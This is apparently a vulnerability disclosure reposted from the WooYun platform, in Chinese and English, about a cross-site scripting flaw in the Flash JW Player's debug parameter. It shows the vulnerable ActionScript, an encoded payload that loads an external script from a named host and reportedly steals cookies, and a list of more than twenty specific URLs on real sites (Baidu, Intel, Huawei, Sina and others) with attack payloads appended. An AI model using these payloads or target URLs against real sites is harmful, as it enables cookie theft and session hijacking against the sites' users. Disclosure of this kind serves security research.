国外的一款播放器，使用网站数量超过百万，官方介绍：“LongTail Video is a New York-based startup that has pioneered the web video market. Our flagship product the – JW Player – is active on over one million websites and streams billions of videos each month.”

该FLASH版本视频播放器代码编写上存在一处安全问题，利用之前我所用到的技巧，可以进行跨站攻击。
它自己主站跨站到无所谓啦，但是用到这个播放器的其它网站就难说了。
比如中国的“去哪儿” ，美国的某某某某站。。

A Xss vulnerability in JWPlayer

Test Browser: IE , Firefox.

Test Platform: Win 7.

1. The Bug code in

package com.longtailvideo.jwplayer.utils
class Logger
private static function send(_arg1:String):void

if (ExternalInterface.available){
ExternalInterface.call(_config.debug, text);<—directly use _config.debug
};

2. The _config.debug is directly used as the first parameter of ExternalInterface.call. And the _config is loaded from loaderInfo.parameters. Therefore, when we construct a link such as ” jwplayer.swf?debug=(function(){alert(‘xxx’)})() “, the passed-in javascript code will be run.

3. Then we can use the trick location.href=’javascript:”<script src={js file url}></script>”‘ to load and run external javascript file.

Test encoded evil code:

http://player.longtailvideo.com/player.swf?debug=(function()%7Blocation.href%3D'javascript%3A%22%3Cscript%2Fsrc%3D%5C'%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C'%3E%3C%2Fscript%3E%22'%7D)

1. Simple Alert

2. Stolen Cookies in a chinese e-commerce website.

已发现存在漏洞的地址列表：

http://tuan.qunar.com/static/img/player.swf?debug=(function()%7Blocation.href%3D’javascript%3A%22%3Cscript%2Fsrc%3D%5C’%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C’%3E%3C%2Fscript%3E%22′%7D%29
http://www.intel.com/about/companyinfo/healthcare/products/reader/swf/player.swf?debug=(function()%7Blocation.href%3D’javascript%3A%22%3Cscript%2Fsrc%3D%5C’%2F%2Fappmaker.sinaapp.com%5C%2Ftest5.js%5C’%3E%3C%2Fscript%3E%22′%7D%29
http://youxi.baidu.com/media/player.swf?debug=function(){alert(/xxx/)}
http://pte.att.com/player.swf?debug=alert
http://pte.att.com/player.swf?debug=alert
http://www.baidu.com/search/zhidao/badminton/jwplayer/player.swf?debug=alert
http://ued.baidu.com/wp-content/plugins/flash-video-player/mediaplayer/player.swf?debug=alert
http://sem.baidu.com/jw_player/player.swf?debug=alert
http://nokia.sina.com.cn/n8/player/player.swf?debug=alert
http://yximg.mop.com/minisite/201007/baodaopage/Scripts/player.swf?debug=alert
http://yximg.mop.com/minisite/200911/jilie/Scripts/player.swf?debug=alert
http://t.live.cntv.cn/oceantest/player.swf?debug=alert
http://tuan.xiu.com/static/theme/YellowUMZZ/img/player.swf?debug=alert
http://images.baihe.com/images/landingpage/images/video/player.swf?debug=alert
http://act.baihe.com/event/1104lovevideo/player.swf?debug=alert http://story.baihe.com/player.swf?debug=alert
http://blog.maps.nokia.com/wp-content/plugins/vipers-video-quicktags/resources/jw-flv-player/player.swf?debug=alert
http://market.360buy.com/zhuanmai/ECOVACS/player.swf?debug=alert
http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert
http://ipv6.huawei.com/en/ucmf/groups/public/documents/webasset/player.swf?debug=alert
http://news.4399.com/tnt/images/player.swf?debug=alert
http://qn.sdo.com/web1/swf/player.swf
http://media.static.sdo.com/ac/ac/project/acguide/flash/player.swf?debug=alert
http://sn.ifeng.com/guowenwangzhan/greensn/video/player.swf?debug=alert
http://dl-hb.9you.com/play/Player.swf?debug=alert
http://all.vic.sina.com.cn/listerine21days/flash/player/player-viral.swf

来源乌云漏洞提交平台